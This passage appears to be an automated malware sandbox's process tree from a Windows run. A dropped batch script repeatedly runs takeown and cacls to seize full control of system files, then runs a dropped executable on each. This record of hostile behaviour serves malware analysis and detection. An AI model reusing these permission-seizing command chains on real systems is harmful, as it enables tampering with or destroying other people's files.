    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C
    3⤵
    PID:3168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
    3⤵
    PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2096
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""
  2⤵
  PID:1148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
    3⤵
    PID:1592
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1360
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""
  2⤵
  PID:3424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "ThemeSettings2013.xml" -nobanner
    3⤵
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "ThemeSettings2013.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2968
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""
  2⤵
  PID:1396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C
    3⤵
    PID:3488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "AssemblyList_4_client.xml" -nobanner
    3⤵
    PID:4048
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "AssemblyList_4_client.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:548
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:3360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:1132
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1140
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
  2⤵
  PID:544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:4048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    3⤵
    PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1144
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
  2⤵
  PID:2424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    3⤵
    PID:2092
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2648
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" /E /G Admin:F /C
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
    3⤵
    PID:3964
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:3968
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:780
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:3256
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:3692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1132
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3256
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "device.png" -nobanner
    3⤵
    PID:3256
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:3692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3968
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2556
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm""
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "qmgr.jfm" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "qmgr.jfm" -nobanner
      4⤵
      PID:3472
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""
  2⤵
  PID:3448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
    3⤵
    PID:3256
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
      4⤵
      PID:3232
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""
  2⤵
  PID:548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
    3⤵
    PID:1244
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
      4⤵
      PID:2424
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""
  2⤵
  PID:648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
    3⤵
    PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
      4⤵
      PID:3460
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:548
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:3460
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl""
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" /E /G Admin:F /C
    3⤵
    PID:3692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
    3⤵
    PID:264
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
      4⤵
      PID:3460
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  2⤵
  PID:3896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "DesktopSettings2013.xml" -nobanner
    3⤵
    PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "DesktopSettings2013.xml" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  2⤵
  PID:3432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
      4⤵
      PID:3772
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  2⤵
  PID:292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
    3⤵
    - Modifies file permissions
    PID:264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    3⤵
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
      4⤵
      PID:3232
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"
    3⤵
    - Modifies file permissions
    PID:3460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "VdiState.xml" -nobanner
    3⤵
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "VdiState.xml" -nobanner
      4⤵
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl""
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" /E /G Admin:F /C
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl"
    3⤵
    - Modifies file permissions
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
    3⤵
    PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
      4⤵
      PID:3432
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl""
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\cacls.exe
